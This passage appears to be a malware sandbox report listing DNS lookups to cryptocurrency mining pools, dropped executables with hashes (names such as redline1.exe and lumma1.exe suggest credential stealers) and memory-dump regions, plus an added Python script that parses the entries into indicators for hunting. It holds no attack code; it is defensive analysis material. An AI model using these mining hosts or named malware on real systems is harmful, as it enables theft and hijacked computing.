  DNS Request: xmr.2miners.com
  DNS Response: 162.19.139.184

• 8.8.8.8:53
  67.65.42.5.in-addr.arpa, dns, 69 B, 129 B, 1, 1
  DNS Request: 67.65.42.5.in-addr.arpa

• 8.8.8.8:53
  184.139.19.162.in-addr.arpa, dns, 73 B, 102 B, 1, 1
  DNS Request: 184.139.19.162.in-addr.arpa

• 8.8.8.8:53
  249.197.17.2.in-addr.arpa, dns, 71 B, 135 B, 1, 1
  DNS Request: 249.197.17.2.in-addr.arpa

• 8.8.8.8:53
  172.210.232.199.in-addr.arpa, dns, 74 B, 128 B, 1, 1
  DNS Request: 172.210.232.199.in-addr.arpa

• 8.8.8.8:53
  22.236.111.52.in-addr.arpa, dns, 72 B, 158 B, 1, 1
  DNS Request: 22.236.111.52.in-addr.arpa

• 8.8.8.8:53
  zeph-eu2.nanopool.org, dns, 67 B, 179 B, 1, 1
  DNS Request: zeph-eu2.nanopool.org
  DNS Response: 163.172.171.111, 51.210.150.92, 51.15.89.13, 51.68.137.186, 51.195.43.17, 51.15.61.114, 51.195.138.197

• 8.8.8.8:53
  17.43.195.51.in-addr.arpa, dns, 71 B, 109 B, 1, 1
  DNS Request: 17.43.195.51.in-addr.arpa
MITRE ATT&CK Enterprise v15

Downloads

                                                                                    • C:\Program Files (x86)\GameSyncLink\GameService.exe

                                                                                      Filesize

                                                                                      288KB

                                                                                      MD5

                                                                                      d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                      SHA1

                                                                                      e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                      SHA256

                                                                                      472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                      SHA512

                                                                                      1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe

                                                                                      Filesize

                                                                                      2.5MB

                                                                                      MD5

                                                                                      e6943a08bb91fc3086394c7314be367d

                                                                                      SHA1

                                                                                      451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                      SHA256

                                                                                      aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                      SHA512

                                                                                      505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                    • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe

                                                                                      Filesize

                                                                                      6.2MB

                                                                                      MD5

                                                                                      1bacbebf6b237c75dbe5610d2d9e1812

                                                                                      SHA1

                                                                                      3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                      SHA256

                                                                                      c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                      SHA512

                                                                                      f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                    • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe

                                                                                      Filesize

                                                                                      13.2MB

                                                                                      MD5

                                                                                      72b396a9053dff4d804e07ee1597d5e3

                                                                                      SHA1

                                                                                      5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                      SHA256

                                                                                      d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                      SHA512

                                                                                      ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                    • C:\Program Files (x86)\GameSyncLink\installc.bat

                                                                                      Filesize

                                                                                      301B

                                                                                      MD5

                                                                                      998ab24316795f67c26aca0f1b38c8ce

                                                                                      SHA1

                                                                                      a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                      SHA256

                                                                                      a468b43795f1083fb37b12787c5ff29f8117c26ac35af470084e00c48280442e

                                                                                      SHA512

                                                                                      7c9c2ade898a8defb6510ddd15730bec859d4474071eb6b8e8738ea6089764f81924ad2a6ebf0479d4fed7d61890edaa38f4bfbf70a4e6b30d33aa5bfc5b5c75

                                                                                    • C:\Program Files (x86)\GameSyncLink\installg.bat

                                                                                      Filesize

                                                                                      284B

                                                                                      MD5

                                                                                      5dee3cbf941c5dbe36b54690b2a3c240

                                                                                      SHA1

                                                                                      82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

                                                                                      SHA256

                                                                                      98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

                                                                                      SHA512

                                                                                      9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

                                                                                    • C:\Program Files (x86)\GameSyncLink\installm.bat

                                                                                      Filesize

                                                                                      218B

                                                                                      MD5

                                                                                      94b87b86dc338b8f0c4e5869496a8a35

                                                                                      SHA1

                                                                                      2584e6496d048068f61ac72f5c08b54ad08627c3

                                                                                      SHA256

                                                                                      2928d8e9a41f39d3802cfd2900d8edeb107666baa942d9c0ffbfd0234b5e5bfc

                                                                                      SHA512

                                                                                      b67eb73fe51d4dba990789f1e0123e902dac6d26569851c3d51ca0a575221ce317f973999d962669016017d8f81a01f11bd977609e66bb1b244334bce2db5d5d

                                                                                    • C:\Users\Admin\1000006002\4cb49b2ba7.exe

                                                                                      Filesize

                                                                                      2.2MB

                                                                                      MD5

                                                                                      02e77a8dd4ec6fffdeebb3bf7e60bece

                                                                                      SHA1

                                                                                      e74f307d3607cf208bb0a2d5dbd597b8257da9a8

                                                                                      SHA256

                                                                                      d50717f0c9e356d3fdb403216daa934227da5803de425a6e42750f83dd029d3f

                                                                                      SHA512

                                                                                      f568d6233f9be9e86567072de33f29555940d3512d164b03d2359c7659b35eb1510760f17b2f28055236daab2cb24a5f39c724065dc69b80f1fe20cb6b8f85da

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe

                                                                                      Filesize

                                                                                      2.7MB

                                                                                      MD5

                                                                                      31841361be1f3dc6c2ce7756b490bf0f

                                                                                      SHA1

                                                                                      ff2506641a401ac999f5870769f50b7326f7e4eb

                                                                                      SHA256

                                                                                      222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

                                                                                      SHA512

                                                                                      53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe

                                                                                      Filesize

                                                                                      402KB

                                                                                      MD5

                                                                                      7f981db325bfed412599b12604bd00ab

                                                                                      SHA1

                                                                                      9f8a8fd9df3af3a4111e429b639174229c0c10cd

                                                                                      SHA256

                                                                                      043839a678bed1b10be00842eae413f5ecd1cad7a0eaa384dd80bc1dcd31e69b

                                                                                      SHA512

                                                                                      a5be61416bc60669523e15213098a6d3bb5a2393612b57863fedfa1ff974bc110e0b7e8aadc97d0c9830a80798518616f9edfb65ae22334a362a743b6af3a82d

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe

                                                                                      Filesize

                                                                                      1.9MB

                                                                                      MD5

                                                                                      4989aefc8b77298974d95ce814d5d259

                                                                                      SHA1

                                                                                      059a4a516f48482de3b86534b3cb64e934e17657

                                                                                      SHA256

                                                                                      fd97d0b7ab1402fa0c7ea8fc7c10ca7d018cb6410ae88f6a48a7f4df331d81d3

                                                                                      SHA512

                                                                                      d4a7bf1599c7a3a1731317ac5c293467f132e9b5c47058218a9504156c1764ed627effb9bc4e16d34d38d01ae629633e37b4eac654529a1935457a33bd1d4247

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe

                                                                                      Filesize

                                                                                      304KB

                                                                                      MD5

                                                                                      9faf597de46ed64912a01491fe550d33

                                                                                      SHA1

                                                                                      49203277926355afd49393782ae4e01802ad48af

                                                                                      SHA256

                                                                                      0854678d655668c8ebb949c990166e26a4c04aef4ecf0191a95693ca150a9715

                                                                                      SHA512

                                                                                      ef8a7a8566eaf962c4e21d49d9c1583ed2cdc9c2751ce75133a9765d2fa6dc511fc6cc99ea871eb83d50bd08a31cb0b25c03f27b8e6f351861231910a6cf1a1e

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe

                                                                                      Filesize

                                                                                      4.2MB

                                                                                      MD5

                                                                                      0f52e5e68fe33694d488bfe7a1a71529

                                                                                      SHA1

                                                                                      11d7005bd72cb3fd46f24917bf3fc5f3203f361f

                                                                                      SHA256

                                                                                      efd29c35766c607aa15d1cb83dec625739791b1616ad37d5b47e78cdb8a42ca8

                                                                                      SHA512

                                                                                      238fbb1c04eef2f2005cb7abf0223e3cd062d9d2840966292e19dcaa495609e134a0bdc35389ae9925ecfc787a13772d3ac7b29058579f702bc849dd0343c400

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe

                                                                                      Filesize

                                                                                      1.0MB

                                                                                      MD5

                                                                                      808c0214e53b576530ee5b4592793bb0

                                                                                      SHA1

                                                                                      3fb03784f5dab1e99d5453664bd3169eff495c97

                                                                                      SHA256

                                                                                      434b1a9bd966d204eef1f4cddb7b73a91ebc5aaf4ac9b4ddd999c6444d92eb61

                                                                                      SHA512

                                                                                      2db3b4cb0233230e7c21cd820bde5de00286fbaedd3fe4dcefb6c66fe6867431f0ee1753fc18dcb89b2a18e888bd15d4d2de29b1d5cd93e425e3fcfe508c79c0

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe

                                                                                      Filesize

                                                                                      1.2MB

                                                                                      MD5

                                                                                      56e7d98642cfc9ec438b59022c2d58d7

                                                                                      SHA1

                                                                                      26526f702e584d8c8b629b2db5d282c2125665d7

                                                                                      SHA256

                                                                                      a2aa61942bae116f8c855fda0e9a991dba92b3a1e2f147aee0e7e2be1bdea383

                                                                                      SHA512

                                                                                      0be0b11de472029bd4e2268cddb5ddb381f7f275dfe50c47b9c836980e5cbfa7f71fe78804ef2180ee110ca9cf36944ec8b8b22babb31a1fc7a6585f79932a1f

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe

                                                                                      Filesize

                                                                                      418KB

                                                                                      MD5

                                                                                      0099a99f5ffb3c3ae78af0084136fab3

                                                                                      SHA1

                                                                                      0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                      SHA256

                                                                                      919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                      SHA512

                                                                                      5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe

                                                                                      Filesize

                                                                                      283KB

                                                                                      MD5

                                                                                      ce08e776b5c5f0ca1c25bd5b2723521a

                                                                                      SHA1

                                                                                      cc0553efdbf99ed5cea0186052e87c5c184ecabb

                                                                                      SHA256

                                                                                      fbc180a6d21301ebef0757be53c40f3f0ba98e3b95eaf1ce6d8af7849587f950

                                                                                      SHA512

                                                                                      a9d548c11dab64ee04b966be7ff87dc0be46b1b5817699b72915fbcebdb1efea35daf1a355103b08048643d579c546c98cee1b6f28af866e0a34fce1b83b6dd8

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe

                                                                                      Filesize

                                                                                      224KB

                                                                                      MD5

                                                                                      300ec4cb5fb7349183bf02c31bc67df3

                                                                                      SHA1

                                                                                      6e42195f6cc83e15f2bc23e3c10acf43b2cca695

                                                                                      SHA256

                                                                                      bf5a4198df4893e6c4f7c59876a06d7feaaf897b2060dc22357aa1d59468ccfc

                                                                                      SHA512

                                                                                      e14bd68a87577763ebe4bd9b45cc1df5e90f4c134e5c031f0236b34cff35c72ae33c83ecc0865a340ec08ca9c5f767f0dc27c270829edd82b40f9e5c94d7488d

                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe

                                                                                      Filesize

                                                                                      4.1MB

                                                                                      MD5

                                                                                      b60c570e26b7a8c5623ae564db51f61e

                                                                                      SHA1

  09bd0c38bf8a6884b4982c63c817077f8d1ac56b
  SHA256    233d0a9054f953119ea58c014c8559b745ece8f2cc16d3673f439f023f93863d
  SHA512    d96c2c3a6143d22c3ee72d60bf438f3dced25fe86125c3c75404444394b37b22c64fcccb18ceda4bf469f7bec250b38114d1b01fe3c5f464da2ad49f5a4ad9b3

• C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
  Filesize  2.5MB
  MD5       ffada57f998ed6a72b6ba2f072d2690a
  SHA1      6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
  SHA256    677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
  SHA512    1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

• C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  Filesize  1.6MB
  MD5       001be162d542c660f606af631a96a943
  SHA1      5d9ddc2c639aa967474fff665f786fdd3b53f6eb
  SHA256    99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d
  SHA512    160285ea718dfec555990bcc43cf4e2dac3cf067cbfb00b4a77c96de5a5977f42965f14a25d6c6f1aadd5187d9e8d3916826a431b098fde61cba4064ac97ddca

• C:\Users\Admin\AppData\Local\Temp\Tmp9A2D.tmp
  Filesize  2KB
  MD5       1420d30f964eac2c85b2ccfe968eebce
  SHA1      bdf9a6876578a3e38079c4f8cf5d6c79687ad750
  SHA256    f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
  SHA512    6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2fjg5s1.m3z.ps1
  Filesize  60B
  MD5       d17fe0a3f47be24a6453e9ef58c94641
  SHA1      6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-711569230-3659488422-571408806-1000\76b53b3ec448f7ccdda2063b15d2bfc3_5fd6b8d9-48b3-42c0-adc7-08f9fe7c965e
  Filesize  2KB
  MD5       e5d7fc7fad77f8ce09495be44db7998e
  SHA1      920e533099f3dafa18b76759fc3941db1778efb6
  SHA256    fe1330c42095179132b0ad33ea3d6c8974d98dc1ec6b23ec2a9b831a12d45a49
  SHA512    e7d24ffd48a8a7160f0a19a13c0e10407395df4d7e51968ac6abce04ec9399e604ae83d6068639368473cebcae7f6c41afe8332663939474a75a500c684671d5

• C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
  Filesize  304KB
  MD5       0c582da789c91878ab2f1b12d7461496
  SHA1      238bd2408f484dd13113889792d6e46d6b41c5ba
  SHA256    a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
  SHA512    a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

• C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
  Filesize  750KB
  MD5       20ae0bb07ba77cb3748aa63b6eb51afb
  SHA1      87c468dc8f3d90a63833d36e4c900fa88d505c6d
  SHA256    daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
  SHA512    db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

• C:\Users\Public\Desktop\Google Chrome.lnk
  Filesize  2KB
  MD5       fe59138b890ef674183c0bc6d2e15935
  SHA1      6271a538000260da0a4c56ed5a2b6b82549c3a69
  SHA256    868dc232f7b220d4d97e13a46257cb3748fe2e36be39241b3a056d3bc7007768
  SHA512    c5e35d0f52e60a566dc2cbde0ecdf66ac9f7b7b0e2bd764e57ab7023617adec3468c70e74182d5fa52baec2b29b70ee7b5af41be137509cbd1877c096bc22ec5

• C:\Users\Public\Desktop\Microsoft Edge.lnk
  Filesize  2KB
  MD5       02100e52fb1d3764475c29fc25fcb59a
  SHA1      fe78c3ddb5d82a276e17e478dc473dbbca72fa0b
  SHA256    809deb04be8c39ba233266e8b283398a891012fb89ecbdbc071d0ddcdbf764f4
  SHA512    72c96153eade1ec3fd47350d3cd56ffbaeaabc6b48fa9d66e4a7bfdcdc103a51ec08cb150e265c633657fb9a8313422310161b5ca3e22cf85f007ce8e233fdbf

• C:\Windows\Temp\830970.exe
  Filesize  2.0MB
  MD5       5c9e996ee95437c15b8d312932e72529
  SHA1      eb174c76a8759f4b85765fa24d751846f4a2d2ef
  SHA256    0eecdbfabaaef36f497e944a6ceb468d01824f3ae6457b4ae4b3ac8e95eebb55
  SHA512    935102aad64da7eeb3e4b172488b3a0395298d480f885ecedc5d8325f0a9eabeea8ba1ece512753ac170a03016c80ba4990786ab608b4de0b11e6343fbf2192b

• C:\Windows\Temp\cudart64_101.dll
  Filesize  398KB
  MD5       1d7955354884a9058e89bb8ea34415c9
  SHA1      62c046984afd51877ecadad1eca209fda74c8cb1
  SHA256    111f216aef35f45086888c3f0a30bb9ab48e2b333daeddafd3a76be037a22a6e
  SHA512    7eb8739841c476cda3cf4c8220998bc8c435c04a89c4bbef27b8f3b904762dede224552b4204d35935562aa73f258c4e0ddb69d065f732cb06cc357796cdd1b2
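
The dropped-file and memory-dump entries in this report are flat "key / value" text, which is awkward to feed into a hunt or to sanity-check by eye. The Python below is an added example, not part of the sandbox's own tooling: it parses a short excerpt copied from the entries above (constructed sample, spacing compressed; it accepts the value either on the same line as the key or on the following line), turns the file entries into a path-to-hashes map, decodes each `memory/PID-N-0xSTART-0xEND-memory.dmp` name, recomputes the region length from the address range and compares it with the reported Filesize, and groups dumped regions by length across PIDs. Two assumptions are mine, not the report's: the size convention (MiB to one decimal, otherwise whole KiB) is inferred from the listed values, and the second number in a dump name is treated only as the report's own ordinal. The "same region length in several PIDs means the same image at ASLR-relocated bases" reading is a heuristic, flagged as such in the code.

```python
"""Parse sandbox dropped-file / memory-dump entries into structured records.

Added example for this report page; not the sandbox's own code.
SAMPLE is a constructed excerpt copied from the entries above, spacing compressed.
"""
import re
from collections import defaultdict

KEYS = ("Filesize", "MD5", "SHA1", "SHA256", "SHA512")
MEM_RE = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

SAMPLE = r"""
• C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
  Filesize 1.6MB
  MD5 001be162d542c660f606af631a96a943
  SHA1 5d9ddc2c639aa967474fff665f786fdd3b53f6eb
  SHA256 99515ba8406bd2bbd7c705f91bdc3fa5b3c6f2f0bdefde82d82d5445898f9a5d
• C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
  Filesize
  304KB
  MD5
  0c582da789c91878ab2f1b12d7461496
  SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
• memory/712-639-0x00000000004F0000-0x00000000009D3000-memory.dmp
  Filesize 4.9MB
• memory/2244-62-0x00000000004F0000-0x00000000009D3000-memory.dmp
  Filesize 4.9MB
• memory/2884-61-0x0000000000590000-0x0000000000A73000-memory.dmp
  Filesize 4.9MB
• memory/812-79-0x0000000000400000-0x0000000000592000-memory.dmp
  Filesize 1.6MB
• memory/3272-0-0x00000000006D0000-0x0000000000C05000-memory.dmp
  Filesize 5.2MB
• memory/1140-121-0x0000000000F00000-0x0000000000FC0000-memory.dmp
  Filesize 768KB
"""


def parse_entries(text):
    """Return [{'name': ..., 'Filesize': ..., 'MD5': ..., ...}, ...].

    A line starting with the bullet opens a new entry; a key may carry its value
    on the same line ("MD5 0c58...") or on the next line, as in the report layout.
    """
    entries, current, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            current = {"name": line[1:].strip()}
            entries.append(current)
            pending = None
            continue
        if current is None:
            continue
        head, _, rest = line.partition(" ")
        if head in KEYS:
            if rest.strip():
                current[head] = rest.strip()
                pending = None
            else:
                pending = head          # value is on the following line
        elif pending:
            current[pending] = line
            pending = None
    return entries


def human_size(nbytes):
    """Render a byte count the way the report does: MiB to one decimal, else whole KiB
    (convention inferred from the listed sizes; assumption)."""
    if nbytes >= 1 << 20:
        return f"{nbytes / (1 << 20):.1f}MB"
    return f"{nbytes // 1024}KB"


def memory_region(entry):
    """Decode a memory/... dump name into (pid, start, end); None for file entries."""
    m = MEM_RE.match(entry["name"])
    if not m:
        return None
    pid, _ordinal, start, end = m.groups()   # _ordinal: the report's dump index
    return int(pid), int(start, 16), int(end, 16)


def check_region_sizes(entries):
    """Cross-check each dump's reported Filesize against its address range.
    Returns [(name, reported, computed, matches), ...]."""
    out = []
    for e in entries:
        r = memory_region(e)
        if r is None:
            continue
        _pid, start, end = r
        computed = human_size(end - start)
        out.append((e["name"], e.get("Filesize"), computed, e.get("Filesize") == computed))
    return out


def regions_by_length(entries):
    """Group dumped regions by length and keep lengths seen in more than one PID.
    Heuristic: identical lengths across processes usually mean the same image
    mapped in each of them at an ASLR-relocated base."""
    groups = defaultdict(set)
    for e in entries:
        r = memory_region(e)
        if r:
            pid, start, end = r
            groups[end - start].add(pid)
    return {length: sorted(pids) for length, pids in groups.items() if len(pids) > 1}


def file_iocs(entries):
    """Return {path: {hash_name: lower-case value}} for the dropped-file entries."""
    iocs = {}
    for e in entries:
        if memory_region(e) is not None:
            continue
        iocs[e["name"]] = {k: e[k].lower() for k in KEYS[1:] if k in e}
    return iocs


if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    for name, reported, computed, ok in check_region_sizes(ents):
        print("OK  " if ok else "DIFF", name, reported, computed)
    for length, pids in regions_by_length(ents).items():
        print(f"region length 0x{length:X} shared by PIDs {pids}")
    for path, hashes in file_iocs(ents).items():
        print(path, hashes.get("SHA256"))
```

On the excerpt above, every reported Filesize matches the address range, and PIDs 712, 2244 and 2884 all dumped a 0x4E3000-byte region (the first two at 0x4F0000, the third at 0x590000), which is what one expects when the same executable is run several times under ASLR; the hash map is what you would feed into an EDR or file-hash sweep.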

• memory/712-639-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/712-641-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/736-333-0x0000000000BF0000-0x0000000000BF1000-memory.dmp  Filesize 4KB
• memory/812-79-0x0000000000400000-0x0000000000592000-memory.dmp  Filesize 1.6MB
• memory/832-430-0x0000000000400000-0x000000000079E000-memory.dmp  Filesize 3.6MB
• memory/1140-458-0x000000001EC60000-0x000000001EE22000-memory.dmp  Filesize 1.8MB
• memory/1140-121-0x0000000000F00000-0x0000000000FC0000-memory.dmp  Filesize 768KB
• memory/1140-436-0x000000001CAD0000-0x000000001CB0C000-memory.dmp  Filesize 240KB
• memory/1140-435-0x000000001BE60000-0x000000001BE72000-memory.dmp  Filesize 72KB
• memory/1140-459-0x000000001F360000-0x000000001F888000-memory.dmp  Filesize 5.2MB
• memory/1140-444-0x000000001E510000-0x000000001E586000-memory.dmp  Filesize 472KB
• memory/1140-445-0x000000001BE40000-0x000000001BE5E000-memory.dmp  Filesize 120KB
• memory/1140-434-0x000000001E300000-0x000000001E40A000-memory.dmp  Filesize 1.0MB
• memory/1156-293-0x0000000000400000-0x000000000063B000-memory.dmp  Filesize 2.2MB
• memory/1156-291-0x0000000000400000-0x000000000063B000-memory.dmp  Filesize 2.2MB
• memory/1508-406-0x0000000000400000-0x000000000078F000-memory.dmp  Filesize 3.6MB
• memory/1568-122-0x0000000000840000-0x0000000000841000-memory.dmp  Filesize 4KB
• memory/1568-124-0x0000000000840000-0x0000000000841000-memory.dmp  Filesize 4KB
• memory/1836-431-0x00000000015D0000-0x0000000001620000-memory.dmp  Filesize 320KB
• memory/1836-169-0x0000000000CB0000-0x0000000000D02000-memory.dmp  Filesize 328KB
• memory/2040-440-0x0000029B0F1E0000-0x0000029B0F200000-memory.dmp  Filesize 128KB
• memory/2244-248-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/2244-462-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/2244-518-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/2244-62-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/2244-404-0x00000000004F0000-0x00000000009D3000-memory.dmp  Filesize 4.9MB
• memory/2412-332-0x0000000000400000-0x0000000000458000-memory.dmp  Filesize 352KB
• memory/2412-334-0x0000000000400000-0x0000000000458000-memory.dmp  Filesize 352KB
• memory/2668-630-0x000001436C6A0000-0x000001436C755000-memory.dmp  Filesize 724KB
• memory/2884-61-0x0000000000590000-0x0000000000A73000-memory.dmp  Filesize 4.9MB
• memory/2884-48-0x0000000076FA4000-0x0000000076FA6000-memory.dmp  Filesize 8KB
• memory/2884-47-0x0000000000590000-0x0000000000A73000-memory.dmp  Filesize 4.9MB
• memory/3084-443-0x0000000004FA0000-0x00000000055C8000-memory.dmp  Filesize 6.2MB
• memory/3084-442-0x00000000048A0000-0x00000000048D6000-memory.dmp  Filesize 216KB
• memory/3084-470-0x00000000071F0000-0x000000000720A000-memory.dmp  Filesize 104KB
• memory/3084-514-0x0000000007480000-0x000000000749A000-memory.dmp  Filesize 104KB
• memory/3084-492-0x0000000007390000-0x00000000073A1000-memory.dmp  Filesize 68KB
• memory/3084-455-0x0000000004F60000-0x0000000004F82000-memory.dmp  Filesize 136KB
• memory/3084-456-0x00000000059E0000-0x0000000005A46000-memory.dmp  Filesize 408KB
• memory/3084-515-0x00000000074C0000-0x00000000074C8000-memory.dmp  Filesize 32KB
• memory/3084-482-0x000000006B3C0000-0x000000006B714000-memory.dmp  Filesize 3.3MB
• memory/3084-510-0x0000000007410000-0x000000000741E000-memory.dmp  Filesize 56KB
• memory/3084-481-0x000000006C480000-0x000000006C4CC000-memory.dmp  Filesize 304KB
• memory/3084-480-0x00000000073B0000-0x00000000073E2000-memory.dmp  Filesize 200KB
• memory/3084-493-0x00000000074D0000-0x0000000007566000-memory.dmp  Filesize 600KB
• memory/3084-460-0x0000000004BA0000-0x0000000004BBE000-memory.dmp  Filesize 120KB
• memory/3084-468-0x0000000006310000-0x0000000006354000-memory.dmp  Filesize 272KB
• memory/3084-513-0x0000000007430000-0x0000000007444000-memory.dmp  Filesize 80KB
• memory/3084-469-0x0000000007850000-0x0000000007ECA000-memory.dmp  Filesize 6.5MB
• memory/3084-457-0x0000000005A50000-0x0000000005DA4000-memory.dmp  Filesize 3.3MB
• memory/3272-2-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-6-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-20-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-1-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-0-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-3-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-4-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-7-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3272-5-0x00000000006D0000-0x0000000000C05000-memory.dmp  Filesize 5.2MB
• memory/3484-521-0x0000000000400000-0x0000000000D1C000-memory.dmp  Filesize 9.1MB
• memory/3484-464-0x0000000000400000-0x0000000000D1C000-memory.dmp  Filesize 9.1MB

                                                                                    • memory/3984-631-0x00000000003B0000-0x00000000008E5000-memory.dmp

                                                                                      Filesize

                                                                                      5.2MB

                                                                                    • memory/3984-643-0x00000000003B0000-0x00000000008E5000-memory.dmp

                                                                                      Filesize

                                                                                      5.2MB

                                                                                    • memory/3996-720-0x000000006EEF0000-0x000000006F244000-memory.dmp

                                                                                      Filesize

                                                                                      3.3MB

                                                                                    • memory/3996-719-0x0000000070DE0000-0x0000000070E2C000-memory.dmp

                                                                                      Filesize

                                                                                      304KB

                                                                                    • memory/4104-143-0x0000000006D10000-0x0000000006D2E000-memory.dmp

                                                                                      Filesize

                                                                                      120KB

                                                                                    • memory/4104-115-0x0000000005DC0000-0x0000000006364000-memory.dmp

                                                                                      Filesize

                                                                                      5.6MB

                                                                                    • memory/4104-315-0x0000000007F80000-0x0000000008142000-memory.dmp

                                                                                      Filesize

                                                                                      1.8MB

                                                                                    • memory/4104-287-0x0000000007330000-0x0000000007396000-memory.dmp

                                                                                      Filesize

                                                                                      408KB

                                                                                    • memory/4104-150-0x00000000071F0000-0x000000000723C000-memory.dmp

                                                                                      Filesize

                                                                                      304KB

                                                                                    • memory/4104-149-0x0000000007080000-0x00000000070BC000-memory.dmp

